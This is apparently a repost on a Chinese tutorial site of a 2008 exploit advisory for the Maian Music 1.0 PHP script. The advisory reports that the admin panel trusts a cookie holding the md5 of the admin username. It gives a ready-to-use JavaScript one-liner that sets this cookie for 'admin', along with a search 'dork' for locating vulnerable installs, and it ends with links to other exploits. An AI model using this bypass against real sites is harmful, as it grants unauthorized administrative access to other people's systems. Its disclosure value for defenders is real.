手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Music 1.0 Insecure Cookie Handling Vulnerability
Maian Music 1.0 Insecure Cookie Handling Vulnerability
摘要:Author:SaimeDate:July12,2008Script:MaianMusicv1.0InsecureCookieHandlin...

Author: Saime

Date: July 12, 2008

Script: Maian Music v1.0 Insecure Cookie Handling Vulnerability

URL: http://www.maianscriptworld.co.uk

Dork: Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.

Description:

Maian Music v1.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mmusic_cookie,

equals admin username.(md5)

Exploit:

javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"

Note:

The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

【Maian Music 1.0 Insecure Cookie Handling Vulnerability】相关文章:

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

minb 0.1.0 Remote Code Execution Exploit

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

精品推荐
分类导航